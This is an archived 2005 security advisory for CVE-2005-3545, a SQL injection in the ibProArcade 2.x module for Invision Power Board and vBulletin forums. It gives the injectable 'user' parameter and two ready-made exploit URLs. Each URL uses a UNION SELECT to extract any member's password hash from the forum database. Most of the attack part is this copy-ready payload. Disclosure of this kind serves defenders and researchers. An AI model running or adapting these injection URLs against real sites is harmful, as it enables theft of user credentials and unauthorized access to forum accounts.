
Topic: |
Sql injection in ibProArcade |
Credit: |
bhfh01 |
Date: |
2005.11.06 |
CWE: |
N/A |
CVE: |
CVE-2005-3545 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
Sql injection in ibProArcade.
#############################
This bug was discoverd in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulettin or Invision power board.
Date:2005-11-5
The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'
Exploit:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
Thankyou , B~HFH
bhfh01 (at) gmail (dot) com [email concealed]
[ ASCII VERSION ]
|